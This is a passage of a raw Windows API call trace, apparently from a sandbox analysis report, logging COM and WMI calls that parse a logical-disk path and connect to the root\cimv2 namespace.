[5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0198.378] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60313c0) returned 0x0 [0198.378] WbemDefPath:IUnknown:Release (This=0x60278f0) returned 0x0 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60313c0) returned 0x0 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0198.378] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbb5838) returned 0x0 [0198.378] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5838, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.379] WbemDefPath:IUnknown:Release (This=0xbb5838) returned 0x3 [0198.379] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0198.379] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0198.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0198.379] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0198.379] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0198.379] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0198.379] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0198.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60313c0) returned 0x0 [0198.379] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0198.379] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0198.379] WbemDefPath:IWbemPath:SetText (This=0x60313c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0198.379] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.379] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0198.379] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0198.379] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0198.379] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.380] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027940) returned 0x0 [0198.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0198.380] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6031430) returned 0x0 [0198.380] WbemDefPath:IUnknown:Release (This=0x6027940) returned 0x0 [0198.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6031430) returned 0x0 [0198.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0198.380] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0198.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0198.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0198.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbb5a28) returned 0x0 [0198.381] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.381] WbemDefPath:IUnknown:Release (This=0xbb5a28) returned 0x3 [0198.381] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0198.381] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0198.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0198.381] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0198.381] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0198.381] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0198.381] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0198.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6031430) returned 0x0 [0198.381] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0198.381] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0198.381] WbemDefPath:IWbemPath:SetText (This=0x6031430, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.381] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0198.381] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0198.381] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.381] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0198.381] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0198.381] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0198.381] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.382] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024938) returned 0x0 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6024938, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0198.382] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024938, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027950) returned 0x0 [0198.382] WbemLocator:IUnknown:Release (This=0x6024938) returned 0x0 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027950) returned 0x0 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0198.382] WbemLocator:IUnknown:AddRef (This=0x6027950) returned 0x3 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0198.382] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0198.382] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0198.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0198.382] WbemLocator:IUnknown:Release (This=0x6027950) returned 0x2 [0198.382] WbemLocator:IUnknown:Release (This=0x6027950) returned 0x1 [0198.382] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0198.383] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0198.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6027950, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027950) returned 0x0 [0198.383] WbemLocator:IUnknown:AddRef (This=0x6027950) returned 0x3 [0198.383] WbemLocator:IUnknown:Release (This=0x6027950) returned 0x2 [0198.383] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0198.383] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0198.383] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.383] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60271d0) returned 0x0 [0198.383] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60334d4) returned 0x0 [0198.982] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b404) returned 0x0 [0198.982] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x60334d4, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0198.982] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0198.982] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b424) returned 0x0 [0198.982] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b404) returned 0x0 [0198.982] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.982] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0198.982] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0198.982] CoTaskMemFree (pv=0xbd4858) [0198.982] WbemLocator:IUnknown:Release (This=0x60271d0) returned 0x0 [0198.982] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b424) returned 0x0 [0198.982] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0198.983] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0198.983] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0198.983] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0198.983] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0198.983] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b384) returned 0x0 [0198.983] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.983] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0198.983] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0198.983] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0198.984] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b40c) returned 0x0 [0198.984] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0198.984] WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0198.984] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0198.984] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0198.984] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0198.984] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60334d4) returned 0x0 [0198.984] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0198.984] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0198.984] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0198.984] SysStringLen (param_1=0x0) returned 0x0 [0198.984] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x8f6ee6c | 